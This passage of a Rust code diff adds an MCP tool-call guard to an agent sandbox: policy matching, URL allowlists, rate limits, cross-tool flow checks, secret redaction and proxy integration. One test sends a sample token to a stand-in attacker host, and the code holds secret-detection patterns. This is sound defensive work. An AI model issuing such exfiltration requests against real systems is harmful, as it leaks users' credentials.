+        Value::Null | Value::Bool(_) | Value::Number(_) => false,
+    }
+}
+
+fn contains_env_var_like_argument(value: &Value) -> bool {
+    match value {
+        Value::Object(map) => map.values().any(contains_env_var_like_argument),
+        Value::Array(items) => items.iter().any(contains_env_var_like_argument),
+        Value::String(text) => looks_like_env_var_reference(text),
+        Value::Null | Value::Bool(_) | Value::Number(_) => false,
+    }
+}
+
+fn exceeds_rate_limit(
+    state: &mut GuardSessionState,
+    tool_name: &str,
+    matched: &MatchedToolPolicy,
+) -> bool {
+    let Some(limit) = matched.rate_limit else {
+        return false;
+    };
+    let key = matched.pattern.as_deref().unwrap_or(tool_name).to_owned();
+    let calls = state.calls_by_pattern.entry(key).or_insert(0);
+    if *calls >= limit.calls {
+        return true;
+    }
+    *calls = calls.saturating_add(1);
+    false
+}
+
+fn violates_cross_tool_flow(
+    config: &McpGuardConfig,
+    state: &mut GuardSessionState,
+    tool_name: &str,
+) -> bool {
+    let current_turn = state.tool_calls_seen;
+    state.tool_calls_seen = state.tool_calls_seen.saturating_add(1);
+
+    let Some(window) = config.cross_tool_flows.forbid_read_to_write_turns else {
+        return false;
+    };
+    let window = window as u64;
+    while state
+        .recent_reads
+        .front()
+        .map(|read| current_turn.saturating_sub(read.turn) > window)
+        .unwrap_or(false)
+    {
+        state.recent_reads.pop_front();
+    }
+
+    if (is_write_tool(tool_name) || is_external_tool(tool_name)) && !state.recent_reads.is_empty() {
+        return true;
+    }
+
+    if is_read_tool(tool_name) {
+        state
+            .recent_reads
+            .push_back(RecentRead { turn: current_turn });
+    }
+
+    false
+}
+
+fn redact_arguments(value: &Value, redact_all: bool) -> Value {
+    if redact_all {
+        return Value::String("[redacted]".to_owned());
+    }
+
+    match value {
+        Value::Object(map) => Value::Object(
+            map.iter()
+                .map(|(key, item)| {
+                    let value = if is_sensitive_key(key) {
+                        Value::String("[redacted]".to_owned())
+                    } else {
+                        redact_arguments(item, false)
+                    };
+                    (key.clone(), value)
+                })
+                .collect(),
+        ),
+        Value::Array(items) => Value::Array(
+            items
+                .iter()
+                .map(|item| redact_arguments(item, false))
+                .collect(),
+        ),
+        Value::String(text) => redact_string(text),
+        Value::Null | Value::Bool(_) | Value::Number(_) => value.clone(),
+    }
+}
+
+fn redact_string(text: &str) -> Value {
+    if looks_like_secret_value(text) || looks_like_env_var_reference(text) {
+        return Value::String("[redacted]".to_owned());
+    }
+
+    if let Ok(mut url) = Url::parse(text) {
+        if matches!(url.scheme(), "http" | "https") {
+            url.set_query(None);
+            url.set_fragment(None);
+            if !url.username().is_empty() {
+                let _ = url.set_username("[redacted]");
+            }
+            let _ = url.set_password(None);
+            return Value::String(url.to_string());
+        }
+    }
+
+    Value::String(text.to_owned())
+}
+
+fn is_sensitive_key(key: &str) -> bool {
+    let key = key.to_ascii_lowercase();
+    [
+        "authorization",
+        "credential",
+        "password",
+        "secret",
+        "token",
+        "api_key",
+        "apikey",
+    ]
+    .iter()
+    .any(|needle| key.contains(needle))
+}
+
+fn looks_like_secret_value(text: &str) -> bool {
+    let trimmed = text.trim();
+    trimmed.starts_with("Bearer ")
+        || trimmed.starts_with("sk-")
+        || trimmed.starts_with("ghp_")
+        || trimmed.starts_with("gho_")
+        || trimmed.starts_with("github_pat_")
+}
+
+fn looks_like_env_var_reference(text: &str) -> bool {
+    let trimmed = text.trim();
+    let name = trimmed
+        .strip_prefix("${")
+        .and_then(|rest| rest.strip_suffix('}'))
+        .or_else(|| trimmed.strip_prefix('$'));
+    name.map(is_env_var_name).unwrap_or(false)
+}
+
+fn is_env_var_name(value: &str) -> bool {
+    let mut chars = value.chars();
+    let Some(first) = chars.next() else {
+        return false;
+    };
+    (first == '_' || first.is_ascii_uppercase())
+        && chars.all(|ch| ch == '_' || ch.is_ascii_uppercase() || ch.is_ascii_digit())
+}
+
+fn is_read_tool(tool_name: &str) -> bool {
+    let name = tool_name.to_ascii_lowercase();
+    [
+        "read", "fetch", "get", "list", "search", "query", "open", "download",
+    ]
+    .iter()
+    .any(|needle| name.contains(needle))
+}
+
+fn is_write_tool(tool_name: &str) -> bool {
+    let name = tool_name.to_ascii_lowercase();
+    [
+        "write", "create", "delete", "remove", "update", "patch", "apply", "commit", "send",
+        "post", "put",
+    ]
+    .iter()
+    .any(|needle| name.contains(needle))
+}
+
+fn is_external_tool(tool_name: &str) -> bool {
+    let name = tool_name.to_ascii_lowercase();
+    name.starts_with("web.")
+        || name.starts_with("http.")
+        || name.contains("fetch")
+        || name.contains("browser")
+        || name.contains("request")
+}
+
+#[cfg(test)]
+mod tests {
+    use std::collections::BTreeMap;
+
+    use agentenv_proto::{
+        McpApprovalMode, McpCrossToolFlowPolicy, McpGuardConfig, McpSessionRateLimit, McpToolPolicy,
+    };
+    use serde_json::json;
+
+    use super::*;
+
+    #[test]
+    fn exact_policy_beats_wildcard_policy() {
+        let config = McpGuardConfig {
+            enabled: true,
+            default_approval: McpApprovalMode::PerCall,
+            tool_policies: [
+                (
+                    "*.write".to_owned(),
+                    McpToolPolicy {
+                        approval: Some(McpApprovalMode::PerSession),
+                        ..McpToolPolicy::default()
+                    },
+                ),
+                (
+                    "filesystem.write".to_owned(),
+                    McpToolPolicy {
+                        approval: Some(McpApprovalMode::Never),
+                        ..McpToolPolicy::default()
+                    },
+                ),
+            ]
+            .into_iter()
+            .collect(),
+            cross_tool_flows: McpCrossToolFlowPolicy::default(),
+        };
+
+        let matched = match_policy(&config, "filesystem.write");
+
+        assert_eq!(matched.pattern.as_deref(), Some("filesystem.write"));
+        assert_eq!(matched.approval, McpApprovalMode::Never);
+    }
+
+    #[test]
+    fn evaluator_flags_url_allowlist_violation_in_nested_args() {
+        let config = McpGuardConfig {
+            enabled: true,
+            default_approval: McpApprovalMode::Never,
+            tool_policies: [(
+                "web.fetch".to_owned(),
+                McpToolPolicy {
+                    url_allowlist: vec!["api.github.com".to_owned()],
+                    ..McpToolPolicy::default()
+                },
+            )]
+            .into_iter()
+            .collect(),
+            cross_tool_flows: McpCrossToolFlowPolicy::default(),
+        };
+        let mut state = GuardSessionState::default();
+        let request = json!({
+            "jsonrpc": "2.0",
+            "id": 1,
+            "method": "tools/call",
+            "params": {
+                "name": "web.fetch",
+                "arguments": {"url": "https://evil.example.test/?token=secret"}
+            }
+        });
+
+        let decision = evaluate_json_rpc_request(&config, &mut state, &request)
+            .expect("request evaluation succeeds");
+
+        assert_eq!(decision.action, GuardAction::Deny);
+        assert_eq!(decision.reason, GuardReason::UrlAllowlistViolation);
+        assert!(!decision
+            .redacted_event_context
+            .to_string()
+            .contains("secret"));
+    }
+
+    #[test]
+    fn session_rate_limit_denies_after_limit() {
+        let config = McpGuardConfig {
+            enabled: true,
+            default_approval: McpApprovalMode::Never,
+            tool_policies: [(
+                "filesystem.read".to_owned(),
+                McpToolPolicy {
+                    rate_limit: Some(McpSessionRateLimit { calls: 1 }),
+                    ..McpToolPolicy::default()
+                },
+            )]
+            .into_iter()
+            .collect(),
+            cross_tool_flows: McpCrossToolFlowPolicy::default(),
+        };
+        let mut state = GuardSessionState::default();
+        let request = json!({
+            "jsonrpc": "2.0",
+            "id": 1,
+            "method": "tools/call",
+            "params": {"name": "filesystem.read", "arguments": {"path": "/tmp/a"}}
+        });
+
+        assert_eq!(
+            evaluate_json_rpc_request(&config, &mut state, &request)
+                .unwrap()
+                .action,
+            GuardAction::Forward
+        );
+        let second = evaluate_json_rpc_request(&config, &mut state, &request).unwrap();
+        assert_eq!(second.action, GuardAction::Deny);
+        assert_eq!(second.reason, GuardReason::RateLimited);
+    }
+
+    #[test]
+    fn read_then_write_inside_flow_window_requires_approval() {
+        let config = McpGuardConfig {
+            enabled: true,
+            default_approval: McpApprovalMode::Never,
+            tool_policies: BTreeMap::new(),
+            cross_tool_flows: McpCrossToolFlowPolicy {
+                forbid_read_to_write_turns: Some(5),
+            },
+        };
+        let mut state = GuardSessionState::default();
+        let read = json!({
+            "jsonrpc": "2.0",
+            "id": 1,
+            "method": "tools/call",
+            "params": {"name": "filesystem.read", "arguments": {"path": "/tmp/secret"}}
+        });
+        let write = json!({
+            "jsonrpc": "2.0",
+            "id": 2,
+            "method": "tools/call",
+            "params": {"name": "web.fetch", "arguments": {"url": "https://api.github.com/repos"}}
+        });
+
+        let first = evaluate_json_rpc_request(&config, &mut state, &read).unwrap();
+        let second = evaluate_json_rpc_request(&config, &mut state, &write).unwrap();
+
+        assert_eq!(first.action, GuardAction::Forward);
+        assert_eq!(second.action, GuardAction::RequestApproval);
+        assert_eq!(second.reason, GuardReason::CrossToolFlow);
+    }
+}

--- a/crates/agentenv-mcp/src/lib.rs
+++ b/crates/agentenv-mcp/src/lib.rs
@@ -1,5 +1,7 @@
 #![forbid(unsafe_code)]
 
+pub mod guard;
+
 use agentenv_core::security::ssrf::{
     sanitize_untrusted_url_text, validate_outbound_with_resolver, DnsResolver, SsrfBlockReason,
     SsrfBlocked, SsrfOptions, ValidatedUrl,

--- a/crates/agentenv-proto/Cargo.toml
+++ b/crates/agentenv-proto/Cargo.toml
@@ -22,3 +22,6 @@ schemars.workspace = true
 serde.workspace = true
 serde_json.workspace = true
 thiserror.workspace = true
+
+[dev-dependencies]
+serde_yaml.workspace = true

--- a/crates/agentenv-proto/build.rs
+++ b/crates/agentenv-proto/build.rs
@@ -25,6 +25,7 @@ fn main() {
     write_schema::<types::NetworkPolicy>(&schema_dir, "network-policy");
     write_schema::<types::DnsPolicy>(&schema_dir, "dns-policy");
     write_schema::<types::McpEndpoint>(&schema_dir, "mcp-endpoint");
+    write_schema::<types::McpGuardConfig>(&schema_dir, "mcp-guard-config");
     write_schema::<types::SandboxSpec>(&schema_dir, "sandbox-spec");
     write_schema::<types::SandboxHandle>(&schema_dir, "sandbox-handle");
     write_schema::<types::SnapshotParams>(&schema_dir, "snapshot-params");

--- a/crates/agentenv-proto/schema/mcp-guard-config.json
+++ b/crates/agentenv-proto/schema/mcp-guard-config.json
@@ -1,0 +1,114 @@
+{
+  "$schema": "http://json-schema.org/draft-07/schema#",
+  "title": "McpGuardConfig",
+  "type": "object",
+  "properties": {
+    "cross_tool_flows": {
+      "default": {
+        "forbid_read_to_write_turns": null
+      },
+      "allOf": [
+        {
+          "$ref": "#/definitions/McpCrossToolFlowPolicy"
+        }
+      ]
+    },
+    "default_approval": {
+      "default": "never",
+      "allOf": [
+        {
+          "$ref": "#/definitions/McpApprovalMode"
+        }
+      ]
+    },
+    "enabled": {
+      "default": false,
+      "type": "boolean"
+    },
+    "tool_policies": {
+      "default": {},
+      "type": "object",
+      "additionalProperties": {
+        "$ref": "#/definitions/McpToolPolicy"
+      }
+    }
+  },
+  "additionalProperties": false,
+  "definitions": {
+    "McpApprovalMode": {
+      "type": "string",
+      "enum": [
+        "never",
+        "per-call",
+        "per-session"
+      ]
+    },
+    "McpCrossToolFlowPolicy": {
+      "type": "object",
+      "properties": {
+        "forbid_read_to_write_turns": {
+          "default": null,
+          "type": [
+            "integer",
+            "null"
+          ],
+          "format": "uint",
+          "minimum": 0.0
+        }
+      },
+      "additionalProperties": false
+    },
+    "McpSessionRateLimit": {
+      "type": "object",
+      "required": [
+        "calls"
+      ],
+      "properties": {
+        "calls": {
+          "type": "integer",
+          "format": "uint32",
+          "minimum": 0.0
+        }
+      }
+    },
+    "McpToolPolicy": {
+      "type": "object",
+      "properties": {
+        "approval": {
+          "default": null,
+          "anyOf": [
+            {
+              "$ref": "#/definitions/McpApprovalMode"
+            },
+            {
+              "type": "null"
+            }
+          ]
+        },
+        "rate_limit": {
+          "default": null,
+          "anyOf": [
+            {
+              "$ref": "#/definitions/McpSessionRateLimit"
+            },
+            {
+              "type": "null"
+            }
+          ]
+        },
+        "redact_args": {
+          "default": false,
+          "type": "boolean"
+        },
+        "url_allowlist": {
+          "default": [],
+          "type": "array",
+          "items": {
+            "type": "string"
+          }
+        }
+      },
+      "additionalProperties": false
+    }
+  }
+}

--- a/crates/agentenv-proto/src/types.rs
+++ b/crates/agentenv-proto/src/types.rs
@@ -135,6 +135,92 @@ pub enum McpTransport {
     SshHttp,
 }
 
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(rename_all = "kebab-case")]
+pub enum McpApprovalMode {
+    Never,
+    PerCall,
+    PerSession,
+}
+
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(deny_unknown_fields)]
+pub struct McpGuardConfig {
+    #[serde(default)]
+    pub enabled: bool,
+    #[serde(default = "default_mcp_approval")]
+    pub default_approval: McpApprovalMode,
+    #[serde(default)]
+    pub tool_policies: BTreeMap<String, McpToolPolicy>,
+    #[serde(default)]
+    pub cross_tool_flows: McpCrossToolFlowPolicy,
+}
+
+#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(deny_unknown_fields)]
+pub struct McpToolPolicy {
+    #[serde(default)]
+    pub approval: Option<McpApprovalMode>,
+    #[serde(default, deserialize_with = "deserialize_mcp_rate_limit")]
+    pub rate_limit: Option<McpSessionRateLimit>,
+    #[serde(default)]
+    pub url_allowlist: Vec<String>,
+    #[serde(default)]
+    pub redact_args: bool,
+}
+
+#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(deny_unknown_fields)]
+pub struct McpCrossToolFlowPolicy {
+    #[serde(default)]
+    pub forbid_read_to_write_turns: Option<usize>,
+}
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+pub struct McpSessionRateLimit {
+    pub calls: u32,
+}
+
+fn default_mcp_approval() -> McpApprovalMode {
+    McpApprovalMode::Never
+}
+
+fn deserialize_mcp_rate_limit<'de, D>(
+    deserializer: D,
+) -> Result<Option<McpSessionRateLimit>, D::Error>
+where
+    D: serde::Deserializer<'de>,
+{
+    #[derive(Deserialize)]
+    #[serde(untagged)]
+    enum RateLimitWire {
+        Text(String),
+        Object { calls: u32 },
+    }
+
+    let wire = Option::<RateLimitWire>::deserialize(deserializer)?;
+    match wire {
+        Some(RateLimitWire::Text(value)) => parse_mcp_session_rate_limit(&value)
+            .map(Some)
+            .map_err(serde::de::Error::custom),
+        Some(RateLimitWire::Object { calls }) => Ok(Some(McpSessionRateLimit { calls })),
+        None => Ok(None),
+    }
+}
+
+fn parse_mcp_session_rate_limit(value: &str) -> Result<McpSessionRateLimit, String> {
+    let (calls, scope) = value
+        .split_once('/')
+        .ok_or_else(|| "expected MCP rate limit in the form <calls>/session".to_owned())?;
+    if scope != "session" {
+        return Err("only MCP rate limits scoped to /session are supported".to_owned());
+    }
+    let calls = calls
+        .parse::<u32>()
+        .map_err(|_| "MCP rate limit calls must be an unsigned integer".to_owned())?;
+    Ok(McpSessionRateLimit { calls })
+}
+
 #[derive(Debug, Clone, Serialize, Deserialize, JsonSchema, PartialEq, Eq)]
 pub struct DriverInfo {
     pub name: String,
@@ -827,5 +913,56 @@ mod tests {
         let kind: ApprovalKind =
             serde_json::from_value(serde_json::json!("package_install")).unwrap();
         assert_eq!(kind, ApprovalKind::PackageInstall);
+    }
+
+    #[test]
+    fn mcp_guard_config_parses_full_yaml() {
+        let yaml = r#"
+enabled: true
+default_approval: per-call
+tool_policies:
+  "filesystem.read":
+    approval: never
+    rate_limit: 50/session
+  "web.fetch":
+    approval: per-call
+    url_allowlist: ["api.github.com", "crates.io"]
+    redact_args: true
+  "*.write":
+    approval: per-session
+cross_tool_flows:
+  forbid_read_to_write_turns: 5
+"#;
+
+        let config: McpGuardConfig = serde_yaml::from_str(yaml).expect("config parses");
+
+        assert!(config.enabled);
+        assert_eq!(config.default_approval, McpApprovalMode::PerCall);
+        assert_eq!(
+            config.tool_policies["filesystem.read"].approval,
+            Some(McpApprovalMode::Never)
+        );
+        assert_eq!(
+            config.tool_policies["filesystem.read"].rate_limit,
+            Some(McpSessionRateLimit { calls: 50 })
+        );
+        assert_eq!(
+            config.tool_policies["web.fetch"].url_allowlist,
+            vec!["api.github.com".to_owned(), "crates.io".to_owned()]
+        );
+        assert_eq!(config.cross_tool_flows.forbid_read_to_write_turns, Some(5));
+    }
+
+    #[test]
+    fn mcp_guard_config_rejects_unknown_fields() {
+        let yaml = r#"
+enabled: true
+surprise: true
+"#;
+
+        let error = serde_yaml::from_str::<McpGuardConfig>(yaml)
+            .expect_err("unknown fields must fail closed");
+
+        assert!(error.to_string().contains("surprise"));
     }
 }

--- a/crates/agentenv/Cargo.toml
+++ b/crates/agentenv/Cargo.toml
@@ -15,6 +15,7 @@ agentenv-approvals = { path = "../agentenv-approvals" }
 agentenv-core = { path = "../agentenv-core" }
 agentenv-credstore = { path = "../agentenv-credstore" }
 agentenv-events = { path = "../agentenv-events" }
+agentenv-mcp = { path = "../agentenv-mcp" }
 agentenv-plugin = { path = "../agentenv-plugin" }
 agentenv-policy = { path = "../agentenv-policy" }
 agentenv-proto = { path = "../agentenv-proto" }
@@ -54,6 +55,7 @@ toml.workspace = true
 tracing.workspace = true
 tracing-subscriber.workspace = true
 url.workspace = true
+uuid.workspace = true
 
 [dev-dependencies]
 assert_cmd = "=2.0.16"

--- a/crates/agentenv/src/main.rs
+++ b/crates/agentenv/src/main.rs
@@ -39,6 +39,7 @@ use tracing_subscriber::EnvFilter;
 mod builtin_factory;
 mod bundle_cli;
 mod credentials_runtime;
+mod mcp_guard_cli;
 mod proxy_cli;
 mod render;
 mod skills_cli;
@@ -87,6 +88,8 @@ enum Commands {
     Drivers(DriversArgs),
     Skills(skills_cli::SkillsArgs),
     Bundle(bundle_cli::BundleArgs),
+    #[command(hide = true, name = "mcp-guard")]
+    McpGuard(McpGuardArgs),
     #[command(hide = true)]
     Proxy(ProxyArgs),
     VerifyBlueprint {
@@ -122,6 +125,29 @@ pub(crate) struct ProxyRunArgs {
     config: PathBuf,
     #[arg(long = "events-db")]
     events_db: PathBuf,
+}
+
+#[derive(Debug, Args)]
+pub(crate) struct McpGuardArgs {
+    #[command(subcommand)]
+    command: McpGuardCommand,
+}
+
+#[derive(Debug, Subcommand)]
+pub(crate) enum McpGuardCommand {
+    Run(McpGuardRunArgs),
+}
+
+#[derive(Debug, Args, Clone)]
+pub(crate) struct McpGuardRunArgs {
+    #[arg(long)]
+    env: String,
+    #[arg(long)]
+    config: PathBuf,
+    #[arg(long = "events-db")]
+    events_db: PathBuf,
+    #[arg(long = "stdio-upstream")]
+    stdio_upstream: String,
 }
 
 #[derive(Debug, Args)]
@@ -620,6 +646,7 @@ async fn run() -> Result<()> {
         Some(Commands::Drivers(command)) => run_drivers(command),
         Some(Commands::Skills(args)) => skills_cli::run_skills(args).await,
         Some(Commands::Bundle(args)) => bundle_cli::run_bundle(args),
+        Some(Commands::McpGuard(args)) => mcp_guard_cli::run(args).await,
         Some(Commands::Proxy(args)) => proxy_cli::run(args).await,
         Some(Commands::VerifyBlueprint { file }) => verify_blueprint(&file),
         Some(Commands::Verify { lockfile }) => verify_lockfile(&lockfile),
@@ -3860,6 +3887,36 @@ mod tests {
                 assert_eq!(args.env, "demo");
                 assert_eq!(args.config, PathBuf::from("/tmp/config.json"));
                 assert_eq!(args.events_db, PathBuf::from("/tmp/events.sqlite"));
+            }
+            other => panic!("unexpected command: {other:?}"),
+        }
+    }
+
+    #[test]
+    fn mcp_guard_command_parses() {
+        let cli = Cli::try_parse_from([
+            "agentenv",
+            "mcp-guard",
+            "run",
+            "--env",
+            "demo",
+            "--config",
+            "/tmp/mcp-guard.json",
+            "--events-db",
+            "/tmp/events.db",
+            "--stdio-upstream",
+            "agentenv-fs-mcp --root /tmp",
+        ])
+        .expect("mcp guard command parses");
+
+        match cli.command {
+            Some(Commands::McpGuard(McpGuardArgs {
+                command: McpGuardCommand::Run(args),
+            })) => {
+                assert_eq!(args.env, "demo");
+                assert_eq!(args.config, PathBuf::from("/tmp/mcp-guard.json"));
+                assert_eq!(args.events_db, PathBuf::from("/tmp/events.db"));
+                assert_eq!(args.stdio_upstream, "agentenv-fs-mcp --root /tmp");
             }
             other => panic!("unexpected command: {other:?}"),
         }

--- a/crates/agentenv/src/mcp_guard_cli.rs
+++ b/crates/agentenv/src/mcp_guard_cli.rs
@@ -1,0 +1,178 @@
+use std::{
+    fs,
+    io::{self, BufRead, BufReader, Write},
+    process::{Command, Stdio},
+};
+
+use agentenv_mcp::guard::{GuardAction, GuardDecision, GuardReason, GuardSessionState};
+use agentenv_proto::{McpApprovalMode, McpGuardConfig};
+use anyhow::{Context, Result};
+use serde_json::{json, Value};
+
+pub(crate) async fn run(args: crate::McpGuardArgs) -> Result<()> {
+    match args.command {
+        crate::McpGuardCommand::Run(args) => {
+            tokio::task::spawn_blocking(move || run_blocking(args))
+                .await
+                .context("join MCP stdio guard task")?
+        }
+    }
+}
+
+fn run_blocking(args: crate::McpGuardRunArgs) -> Result<()> {
+    let _events_db = args.events_db;
+    let config: McpGuardConfig = serde_json::from_slice(
+        &fs::read(&args.config)
+            .with_context(|| format!("read MCP guard config `{}`", args.config.display()))?,
+    )
+    .with_context(|| format!("parse MCP guard config `{}`", args.config.display()))?;
+    let mut child = Command::new("sh")
+        .arg("-c")
+        .arg(&args.stdio_upstream)
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .spawn()
+        .with_context(|| format!("spawn MCP stdio upstream `{}`", args.stdio_upstream))?;
+    let mut child_stdin = child.stdin.take().context("open upstream stdin")?;
+    let child_stdout = child.stdout.take().context("open upstream stdout")?;
+    let mut child_stdout = BufReader::new(child_stdout);
+    let stdin = io::stdin();
+    let mut stdin = BufReader::new(stdin.lock());
+    let stdout = io::stdout();
+    let mut stdout = stdout.lock();
+    let mut state = GuardSessionState::default();
+
+    while let Some(body) = read_lsp_message(&mut stdin)? {
+        let decision = evaluate_client_message(&config, &mut state, &body);
+        match decision.action {
+            GuardAction::Deny | GuardAction::RequestApproval => {
+                let id = json_rpc_id(&body);
+                let response = json_rpc_error_response(id, -32004, "MCP tool call denied by guard");
+                write_lsp_message(&mut stdout, &response)?;
+                stdout.flush().context("flush guarded MCP response")?;
+            }
+            GuardAction::Forward | GuardAction::NotToolCall => {
+                write_lsp_message(&mut child_stdin, &body)?;
+                child_stdin.flush().context("flush upstream MCP request")?;
+                let Some(response) = read_lsp_message(&mut child_stdout)? else {
+                    break;
+                };
+                write_lsp_message(&mut stdout, &response)?;
+                stdout.flush().context("flush upstream MCP response")?;
+            }
+        }
+    }
+
+    let _ = child.kill();
+    let _ = child.wait();
+    Ok(())
+}
+
+pub(crate) fn read_lsp_message<R: BufRead>(reader: &mut R) -> Result<Option<Vec<u8>>> {
+    let mut content_length = None;
+    let mut line = String::new();
+    loop {
+        line.clear();
+        let bytes = reader
+            .read_line(&mut line)
+            .context("read MCP frame header")?;
+        if bytes == 0 {
+            return Ok(None);
+        }
+        let trimmed = line.trim_end_matches(['\r', '\n']);
+        if trimmed.is_empty() {
+            break;
+        }
+        if let Some((name, value)) = trimmed.split_once(':') {
+            if name.eq_ignore_ascii_case("content-length") {
+                content_length = Some(
+                    value
+                        .trim()
+                        .parse::<usize>()
+                        .context("parse MCP frame content length")?,
+                );
+            }
+        }
+    }
+
+    let length = content_length.context("MCP frame missing Content-Length header")?;
+    let mut body = vec![0; length];
+    reader
+        .read_exact(&mut body)
+        .context("read MCP frame body")?;
+    Ok(Some(body))
+}
+
+pub(crate) fn write_lsp_message<W: Write>(writer: &mut W, body: &[u8]) -> Result<()> {
+    write!(writer, "Content-Length: {}\r\n\r\n", body.len()).context("write MCP frame header")?;
+    writer.write_all(body).context("write MCP frame body")?;
+    Ok(())
+}
+
+pub(crate) fn evaluate_client_message(
+    config: &McpGuardConfig,
+    state: &mut GuardSessionState,
+    body: &[u8],
+) -> GuardDecision {
+    let request = match serde_json::from_slice::<Value>(body) {
+        Ok(request) => request,
+        Err(error) => {
+            return malformed_decision(format!("invalid JSON-RPC body: {error}"));
+        }
+    };
+    match agentenv_mcp::guard::evaluate_json_rpc_request(config, state, &request) {
+        Ok(decision) => decision,
+        Err(error) => malformed_decision(error.to_string()),
+    }
+}
+
+pub(crate) fn json_rpc_error_response(id: Value, code: i64, message: &str) -> Vec<u8> {
+    serde_json::to_vec(&json!({
+        "jsonrpc": "2.0",
+        "id": id,
+        "error": {
+            "code": code,
+            "message": message,
+        }
+    }))
+    .unwrap_or_else(|_| {
+        b"{\"jsonrpc\":\"2.0\",\"id\":null,\"error\":{\"code\":-32603,\"message\":\"internal error\"}}"
+            .to_vec()
+    })
+}
+
+fn malformed_decision(message: String) -> GuardDecision {
+    GuardDecision {
+        action: GuardAction::Deny,
+        reason: GuardReason::MalformedToolCall,
+        tool_name: None,
+        matched_policy: None,
+        approval_mode: McpApprovalMode::Never,
+        redacted_event_context: json!({ "error": message }),
+    }
+}
+
+fn json_rpc_id(body: &[u8]) -> Value {
+    serde_json::from_slice::<Value>(body)
+        .ok()
+        .and_then(|value| value.get("id").cloned())
+        .unwrap_or(Value::Null)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn lsp_message_round_trips_body() {
+        let body = br#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#;
+        let mut out = Vec::new();
+        write_lsp_message(&mut out, body).unwrap();
+
+        let decoded = read_lsp_message(&mut std::io::BufReader::new(out.as_slice()))
+            .unwrap()
+            .unwrap();
+
+        assert_eq!(decoded, body);
+    }
+}

--- a/crates/agentenv/src/proxy_cli.rs
+++ b/crates/agentenv/src/proxy_cli.rs
@@ -28,6 +28,7 @@ use axum::{
     routing::any,
     Router,
 };
+use http_body_util::BodyExt;
 use reqwest::redirect::Policy as RedirectPolicy;
 use tokio::sync::RwLock;
 use url::Url;
@@ -41,6 +42,8 @@ struct ProxyState {
     client: reqwest::Client,
     events: Arc<dyn EventEmitter>,
     rate_limits: Arc<Mutex<BTreeMap<String, FixedWindowLimiter>>>,
+    mcp_guard_states: Arc<Mutex<BTreeMap<String, agentenv_mcp::guard::GuardSessionState>>>,
+    approval_coordinator: Option<agentenv_approvals::ApprovalCoordinator>,
 }
 
 #[derive(Debug, Clone)]
@@ -103,6 +106,22 @@ async fn run_proxy(args: crate::ProxyRunArgs) -> Result<()> {
         vec![Box::new(SqliteSink::new(args.events_db.clone()))],
     );
     let events = Arc::new(dispatcher.emitter()) as Arc<dyn EventEmitter>;
+    let env_dir = args
+        .events_db
+        .parent()
+        .context("events db path must live under an env directory")?
+        .to_path_buf();
+    let approval_coordinator = Some(agentenv_approvals::ApprovalCoordinator::new(
+        agentenv_approvals::ApprovalCoordinatorConfig {
+            store: agentenv_approvals::ApprovalStore::open(&args.events_db)
+                .context("open approval store for egress proxy")?,
+            events: Arc::clone(&events),
+            poll_interval: Duration::from_millis(250),
+            overlay_path: Some(env_dir.join("approval-policy-overlay.yaml")),
+            proposal_path: Some(env_dir.join("approval-policy-proposals.yaml")),
+            notifications: None,
+        },
+    ));
     let client = reqwest::Client::builder()
         .no_proxy()
         .redirect(RedirectPolicy::none())
@@ -122,6 +141,8 @@ async fn run_proxy(args: crate::ProxyRunArgs) -> Result<()> {
                 .map(|(route_id, limit)| (route_id.clone(), FixedWindowLimiter::from_config(limit)))
                 .collect(),
         )),
+        mcp_guard_states: Arc::new(Mutex::new(BTreeMap::new())),
+        approval_coordinator,
     };
 
     let listener = tokio::net::TcpListener::bind(listen_addr(&config.listen_url)?)
@@ -223,6 +244,11 @@ async fn handle_proxy_request(
             StatusCode::TOO_MANY_REQUESTS,
             "rate limited\n",
         ));
+    }
+
+    let (guard_response, request) = maybe_handle_mcp_guard(&state, &route, request).await?;
+    if let Some(response) = guard_response {
+        return Ok(response);
     }
 
     let secret = state
@@ -552,6 +578,208 @@ fn rate_limit_allows(state: &ProxyState, route_id: &str) -> Result<bool> {
         .is_none_or(|limit| limit.allow(Instant::now())))
 }
 
+async fn maybe_handle_mcp_guard(
+    state: &ProxyState,
+    route: &BrokerRoute,
+    request: Request<Body>,
+) -> Result<(Option<Response<Body>>, Request<Body>)> {
+    let Some(config) = route.mcp_guard.as_ref().filter(|config| config.enabled) else {
+        return Ok((None, request));
+    };
+    if !matches!(route.service, BrokerService::Mcp { .. })
+        || request.method() != Method::POST
+        || !request_content_type_is_json(request.headers())
+    {
+        return Ok((None, request));
+    }
+
+    let (parts, body) = request.into_parts();
+    let bytes = body
+        .collect()
+        .await
+        .context("read MCP guard request body")?
+        .to_bytes();
+    let json = match serde_json::from_slice::<serde_json::Value>(&bytes) {
+        Ok(json) => json,
+        Err(error) => {
+            tracing::warn!(%error, route_id = %route.id, "egress proxy rejected malformed MCP JSON body");
+            let request = Request::from_parts(parts, Body::from(bytes));
+            return Ok((
+                Some(text_response(StatusCode::BAD_REQUEST, "invalid mcp json\n")),
+                request,
+            ));
+        }
+    };
+
+    let decision = {
+        let mut states = state
+            .mcp_guard_states
+            .lock()
+            .map_err(|_| anyhow::anyhow!("MCP guard state lock poisoned"))?;
+        let guard_state = states.entry(route.id.clone()).or_default();
+        agentenv_mcp::guard::evaluate_json_rpc_request(config, guard_state, &json)
+    };
+    let decision = match decision {
+        Ok(decision) => decision,
+        Err(error) => {
+            tracing::warn!(%error, route_id = %route.id, "egress proxy rejected malformed MCP tool call");
+            let request = Request::from_parts(parts, Body::from(bytes));
+            return Ok((
+                Some(text_response(StatusCode::FORBIDDEN, "mcp tool denied\n")),
+                request,
+            ));
+        }
+    };
+
+    emit_mcp_guard_event(state, route, &decision);
+
+    let action = decision.action;
+    let request = Request::from_parts(parts, Body::from(bytes));
+    match action {
+        agentenv_mcp::guard::GuardAction::Deny => Ok((
+            Some(text_response(StatusCode::FORBIDDEN, "mcp tool denied\n")),
+            request,
+        )),
+        agentenv_mcp::guard::GuardAction::RequestApproval => {
